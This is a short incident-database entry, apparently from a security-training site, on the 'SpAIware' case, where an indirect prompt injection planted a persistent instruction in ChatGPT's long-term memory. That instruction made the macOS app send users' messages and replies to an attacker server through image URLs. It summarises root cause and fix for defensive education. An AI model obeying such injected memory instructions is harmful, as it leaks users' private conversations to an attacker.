Indirect Prompt InjectionHigh

SpAIware: persistent ChatGPT memory injection

September 2024  ·  OpenAI ChatGPT (macOS)

What happened

A prompt injection could write a persistent instruction into ChatGPT long-term memory, causing it to continuously exfiltrate the user's messages and the model's responses to an attacker server across all future sessions.

Root cause

Untrusted content could write to persistent memory, and the macOS app rendered images allowing URL-based data egress. Memory persistence made the injection durable.

Fix / outcome

OpenAI shipped a fix in the ChatGPT macOS app that closed the image and URL exfiltration vector.

Sources

Embrace The Red

Learn this attack class

This incident is an example of Indirect Prompt Injection. Read the guide, then try it hands-on in the Academy.

Read the guide →Try the challenge

← Back to the Incident Database